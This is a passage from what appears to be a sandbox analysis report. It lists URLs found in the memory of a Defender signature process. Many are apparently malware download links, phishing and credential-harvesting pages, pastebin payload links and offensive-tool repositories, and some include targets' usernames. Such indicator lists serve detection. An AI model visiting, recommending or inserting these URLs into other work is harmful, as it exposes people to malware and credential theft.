Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp String found in binary or memory: https://myexternalip.com/rawx
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://mylovelybluesky.com
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://myoffice365-online.com/login/common/login/mridings
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: https://myscape.in/ds/161120.gif
Source: MpSigStub.exe, 00000024.00000003.6306777580.00000197A39F4000.00000004.00000001.sdmp String found in binary or memory: https://mywebscrap.com/ds/0402.gif
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp String found in binary or memory: https://mz.ht-aslice.online/?e=a.wirth
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://mz.ht-aslice.online/?e=erdinc.gok
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp String found in binary or memory: https://mz.ht-aslice.online/?e=mike.platt
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: https://n9.cl/d9fii
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp String found in binary or memory: https://navigator.fun/wp-content/plugins/refer-a-friend-for-woocommerce-by-wpgens/public/js/mcb8abrb
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: https://netorgft3012202.sharepoint.com/:b:/s/investments/ewhzfsivbvbdn1vhk8eejpcbnbcaan_xlbd5e7fn2lp
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp String found in binary or memory: https://neuroconversions.com/wp-content/
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp String found in binary or memory: https://neuroconversions.com/wp-content/plugins/po4/excelz/index.php?email=
Source: MpSigStub.exe, 00000024.00000003.6332222979.00000197A4170000.00000004.00000001.sdmp String found in binary or memory: https://neverlose.cc/
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: https://newsiest-grid.000webhostapp.com/dhl/dhla/dhl%20auto/index.php?email=kani.junichi
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp String found in binary or memory: https://newtrp.com/e8/rexifly.php
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: https://newwets.com/zip/document.php
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: https://nexustiles.com/y29yaw5uzs5oewxhbmrac2fudgfjcnv6y291bnr5lnvz
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: https://nhacaiuytin888.com/mail/now.php
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://nicoleiman.com/zmxvcmvuy2lhqhnpbxrly2guys1zdgfylmvkds5zzw==
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp String found in binary or memory: https://nonamesv.xsiazon.xyz/?e=
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: https://norsecompassgroup.com/4eqmrlzmq9r/lipa.html
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: https://notabug.org/microsoft-office/word-templates/raw/master/template.dotm
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp String found in binary or memory: https://notes.topix21century.com/asp/kys_allow_get.asp?name=getkys.kys
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: https://novaworld-resort.com/wp-admin/user/delis/ite1/links.doc
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp String found in binary or memory: https://oauth2.googleapis
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: https://objectstorage.uk-london-1.oraclecloud.com/n/lrxg46lu57ma/
Source: MpSigStub.exe, 00000024.00000003.6290223213.00000197A39E2000.00000004.00000001.sdmp String found in binary or memory: https://objectstorage.us-ashburn-1.oraclecloud.com/n/idb0azuxzsop/b/viperwee/o/voicee.mp3
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://objectstorage.us-phoenix-1.oraclecloud.com/n/axfwptiilgjl/b/azu/o/vn.html#support
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp String found in binary or memory: https://odbtgld.s3.eu-central-1.amazonaws.com/setups.exe
Source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp String found in binary or memory: https://odbtgld.s3.eu-central-1.amazonaws.com/setups.exeac
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://oemands.dk/xmlrpc.php
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: https://office.com/start/myaccount.aspx
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://office.insureusun.com/?e=simona.merzagora
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: https://office.live.com/start/
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://office365.com
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://ohgstd-adnazad.c9users.io/update/validate/
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: https://oidblueprin.at/3/str.dll
Source: MpSigStub.exe, 00000024.00000003.6283020613.00000197A471D000.00000004.00000001.sdmp String found in binary or memory: https://oksearch.org/xa2/click.html
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp String found in binary or memory: https://olisseytravel.az/wp-content/themes/themesnewsa/js/zxz/new.php
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: https://olympiacus.accesscam.org/pdf/opo.php
Source: MpSigStub.exe, 00000024.00000003.6306777580.00000197A39F4000.00000004.00000001.sdmp String found in binary or memory: https://one.co.il
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp String found in binary or memory: https://onedrive.live.com/download.aspx?cid=7df9938cb8d94df3&authkey=%21ajy8jfax0aqsibs&resid=7df993
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://onestoprnd.com/wp-content/plugins_new/1902/next.php
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp String found in binary or memory: https://onlinebebeksepeti.com/puyo/
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp String found in binary or memory: https://organigrama.gualda.com
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: https://ostoja.tk/browser.php
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp String found in binary or memory: https://ourcomm.co.uk/wp-content/plugins/buddyboss-platfo
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: https://outlook.office.com/api/
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: https://ov.m4sh-up1x.xyz/?e=
Source: MpSigStub.exe, 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp String found in binary or memory: https://ovjdyp9iz3r.typeform.com/to/kpapmnfe
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp String found in binary or memory: https://ozmontelectrical.com/drms/fert.html
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp String found in binary or memory: https://paf.gov-mail.net/13621/1/18844/2/0/0/1390324815/files-b74d99d6/hta
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: https://panolinuk-my.sharepoint.com/:b:/g/personal/paul_holland_panolin_co_uk/eewdyq0-yzdfhxzreappqk
Source: MpSigStub.exe, 00000024.00000003.6332905468.00000197A3592000.00000004.00000001.sdmp String found in binary or memory: https://paste.ee/d/n9jsq/0
Source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp String found in binary or memory: https://paste.ee/r/26jiy/0
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: https://paste.ee/r/c9fe4/0
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp String found in binary or memory: https://paste.ee/r/cikn9/0
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: https://pastebin.com
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: https://pastebin.com/
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: https://pastebin.com/raw
Source: MpSigStub.exe, 00000024.00000003.6320126679.00000197A4068000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://pastebin.com/raw/
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: https://pastebin.com/raw/2STTYftz
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp String found in binary or memory: https://pastebin.com/raw/G0jcGs79
Source: MpSigStub.exe, 00000024.00000003.6321480698.00000197A3B3E000.00000004.00000001.sdmp String found in binary or memory: https://pastebin.com/raw/g10EQ6PS
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp String found in binary or memory: https://pastebin.com/raw/sf3gviaw
Source: MpSigStub.exe, 00000024.00000003.6311649432.00000197A38AA000.00000004.00000001.sdmp String found in binary or memory: https://pastebinp.com/raw/1Tuj3CF7
Source: MpSigStub.exe, 00000024.00000003.6311649432.00000197A38AA000.00000004.00000001.sdmp String found in binary or memory: https://pastebinp.com/raw/itDEZ39X
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: https://paxful.com
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://pay.2go.com/payment/2-1301222-qoo1mwri7zqbuxa2)
Source: MpSigStub.exe, 00000024.00000003.6342578169.00000197A421C000.00000004.00000001.sdmp String found in binary or memory: https://pay.yac.mx
Source: MpSigStub.exe, 00000024.00000003.6342578169.00000197A421C000.00000004.00000001.sdmp String found in binary or memory: https://pay.yac.mxx:
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp String found in binary or memory: https://pd.gy-lnoice.online/?e=dskodras
Source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp String found in binary or memory: https://pediatriadrgonzales.com/wp-content/themes/betheme/js/parallax/vrgcm7nkd.php
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://peregrineplastics-my.sharepoint.com/:o:/g/personal/bsmith_peregrine_build/erg-sjvfekzmix8xbx
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp String found in binary or memory: https://personalizasp.com.br/wp-admin/maint/redirect/
Source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp String found in binary or memory: https://petlineir.com/mason/amstream.exe
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp String found in binary or memory: https://photofinderplus.com/s/?api=
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp String found in binary or memory: https://picsum.photos/80
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: https://piedmontrescue.org/sport/rockstar.php
Source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp String found in binary or memory: https://pigeonious.com/img/
Source: MpSigStub.exe, 00000024.00000003.6278189283.00000197A3970000.00000004.00000001.sdmp String found in binary or memory: https://pinkconnext.com/ds/26.gif
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp String found in binary or memory: https://piscineconstruct.ro/kjy/index.php
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp String found in binary or memory: https://pjoao1578pro2.site/crypt/vbscript.txt
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp String found in binary or memory: https://platform.jsecoin.com/?lander=1&utm_source=referral&utm_campaign=aff
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp String found in binary or memory: https://playmesadelsol.com/wp-content/off/rt35.exe
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: https://plectrum.sebdelaweb.com/mnmn/index.php
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: https://poOsKYsdcast.oigaprofe.com.mx/wp-includes/sodiumOsKYs_comOsKYspat/src/Core32/ChaCha20/KlrIU4
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://podcast.oigaprofe.com.mx/wp-includes/sodium_compat/src/Core32/ChaCha20/KlrIU42g.php
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp String found in binary or memory: https://postotravessia.com.br/wp-admin/network/redirect/
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp String found in binary or memory: https://ppam.sslblindado.com/pande.html
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: https://preoccupationology.com/thisshit
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp String found in binary or memory: https://pressionism.xyz/bbc.exe
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp String found in binary or memory: https://pro-fit.pk/exploit.exe
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: https://producingemotions.es/settlementstatements242019/cgi-bin/office/index.html
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: https://produsedecalitate.ro/request.php
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: https://profdocame.co.vu/1/wp-config/storage/web.app.delve/access/draw9901/8269380-attachment-micros
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://property.appskeeper.com/wp-content/plugins/lite-cache/3Rx12s64qbadA.php
Source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp String found in binary or memory: https://provodi.com/snn/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://prt.phosagro.ru/oa_html/rf.jsp?function_id=16181&resp_id=-1&resp_appl_id=-1&security_group_i
Source: MpSigStub.exe, 00000024.00000003.6290223213.00000197A39E2000.00000004.00000001.sdmp String found in binary or memory: https://ps.ks-voicemail.online/?e=richana.nelson
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp String found in binary or memory: https://ps.outlook.com/powershell-liveid
Source: MpSigStub.exe, 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp String found in binary or memory: https://psychedelicassistedsessions.com/f2ewq5kfmdhcsac.exe-o%appdata%
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp String found in binary or memory: https://ptpb.pw/jj9a
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp String found in binary or memory: https://pubupl.com/updates/
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp String found in binary or memory: https://pwndrop.gumtreeza.com/upywreoz/zma.exe
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: https://pxlme.me/cytyoc4h
Source: MpSigStub.exe, 00000024.00000003.6354030665.00000197A41B3000.00000004.00000001.sdmp String found in binary or memory: https://pypi.python.org/packages/source/
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: https://queentour.co.id/z/s.dot
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp String found in binary or memory: https://quickbooks.aeymotors.com/soft.dll
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp String found in binary or memory: https://quirky-blackwell.23-227-196-69.plesk.page/mail/inbox%3dmessage/1/index.php
Source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp String found in binary or memory: https://r0lls-r0yce.com/eft/remit.dotm?raw=true
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp String found in binary or memory: https://rachelzy.com/yyyy/myoriginlogger.exe
Source: MpSigStub.exe, 00000024.00000003.6278189283.00000197A3970000.00000004.00000001.sdmp String found in binary or memory: https://radh.ga/konzo/change.php
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: https://raifeisen.co/invoice/id/305674567
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp String found in binary or memory: https://ramashardware.co.za/
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp String found in binary or memory: https://ramblerimport.com/hz4uhlut5au/yu.html
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp String found in binary or memory: https://ramechanicsplus.work/manuel/ywrhbwtvdmfaa2vtcgvylmv1
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: https://rapid.cerner.com:8243/clientapi/v1.0/clients/mnemonic/
Source: MpSigStub.exe, 00000024.00000003.6306777580.00000197A39F4000.00000004.00000001.sdmp String found in binary or memory: https://raw.githubusercontent.com/aybiota/mpbh33775/gh-pages/g9wl5dp.ttf
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp String found in binary or memory: https://raw.githubusercontent.com/elevenpaths/ibombshell/
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp String found in binary or memory: https://raw.githubusercontent.com/powershellmafia/powersploit/
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp String found in binary or memory: https://raw.githubusercontent.com/sharkush/test1/master/calcush.sct
Source: MpSigStub.exe, 00000024.00000003.6326497821.00000197A3203000.00000004.00000001.sdmp String found in binary or memory: https://raw.githubusercontent.com/wmitoapi/test/master/compiler.zip
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp String found in binary or memory: https://rawcdn.githack.net/up.php?key=5
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: https://rb.gy/kc5b5e
Source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: https://rb.gy/kc5b5e?#ncota
Source: MpSigStub.exe, 00000024.00000003.6269788057.00000197A4C44000.00000004.00000001.sdmp String found in binary or memory: https://realmjoin-backend-staging.azurewebsites.net/api/system/check
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://referralpays.com/aki2root/uzie/actions.php
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: https://register.hiramhousecamp.org/miouadthen/po1820.zip
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp String found in binary or memory: https://relaja.me/qw5hlk1vcmvqb25azglzywdydxbvlmvz
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: https://relaja.me/u2viyxn0awfulln0sm9obkbtzxryb2jhbmsucgxjlnvr
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp String found in binary or memory: https://remote.bittorrent.com
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: https://remoteally.com/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: https://reneerouleau.us/az/az.doc
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: https://rewardamericanexpress.blob.core.windows.net/aexp/online.americanexpress.com0smyca
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: https://rezultmedia.com/css/reportdhlnew.php
Source: MpSigStub.exe, 00000024.00000003.6290223213.00000197A39E2000.00000004.00000001.sdmp String found in binary or memory: https://rezultmedia.com/vendor/laravel/tinker/src/reportexcelnew.php
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp String found in binary or memory: https://ringco.com.co/cache/
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://rnatrixblade.net/nj.php
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://rollingrockcolumbia.com/wp-admin/admin-ajax.php
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: https://rotf.lol/3u6d9443
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: https://rw.mousewinning.club/?
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: https://s.xcodelib.net/updates/ff/apps/119/10080008.xml
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: https://s.xcodelib.net/updates/ff/apps/119/10080009.xml
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: https://s.xcodelib.net/updates/ff/apps/900/10010045.xml
Source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp String found in binary or memory: https://s.xcodelib.net/updates/ff/apps/appPrefId/affPrefId.xml
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp String found in binary or memory: https://s1.ax1x.com/2020/04/28/J4Zp9S.png
Source: MpSigStub.exe, 00000024.00000003.6306777580.00000197A39F4000.00000004.00000001.sdmp String found in binary or memory: https://s18.picofile.com/d/8435906618/a27ddc7a-8599-479b-9e19-f2fd4b1988c3/setup.exe
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: https://s3-ap-northeast-1.amazonaws.com/update-secure/asmsgrbarb.zip
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: https://s3-eu-west-1.amazonaws.com/adkooo/
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp String found in binary or memory: https://s3.amazonaws.com/exec459/exec.tgz
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: https://s3.us-east-2.amazonaws.com/cotazion.pago/recibo.html
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://sad-goldwasser.62-108-34-75.plesk.page/doc00289?
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp String found in binary or memory: https://scabraldealdun.com/hghgh/aridonorigin.exe
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp String found in binary or memory: https://scalet.publicvm.com/large2/next.php
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: https://scaricapag.win/eco
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: https://screw-malwrhunterteams.com/scanme.txt
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: https://sddfdfdf.typeform.com/to/vrfwamwx
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: https://secure.hotbar.com/
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6341224894.00000197A35D4000.00000004.00000001.sdmp String found in binary or memory: https://secure.logmeinrescue.com/
Source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp String found in binary or memory: https://secure.tibia.com/account/?subtopic=accountmanagement
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp String found in binary or memory: https://secured-links.org/connect
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: https://secureloginauth.ru/mcavy/.dave.php
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: https://securezalink.com/home.jpg/security.ocx
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: https://seeing.mm.am/deluxe/
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: https://selmersax.de/wp-content/themes/rehub/bpge/front/msg.jpg
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: https://serv.fkn-srv.xyz/?e=tom.hughes
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://server.voiplogger0365.xyz/?e=csizemore
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp String found in binary or memory: https://seyedishop.ir/rh1/pmt.php
Source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp String found in binary or memory: https://shaastraarth.in/bbbg/
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp String found in binary or memory: https://shatha.n-idea.us/moo/
Source: MpSigStub.exe, 00000024.00000003.6306777580.00000197A39F4000.00000004.00000001.sdmp String found in binary or memory: https://shop.asopalav.com/ds/0302.gif
Source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: https://shoplady.xyz/glsdil.php
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp String found in binary or memory: https://shoptimes.ro/admin/clienti/opo.php
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp String found in binary or memory: https://shouldntthrowstones.co.uk/vv/exl-idnero.php?loginhtw952
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://shreyainfosoft.com/krishnasteelcorporation/next.php
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: https://shreyainfosoft.com/shayonajwellers/after.php
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: https://signin.ebay
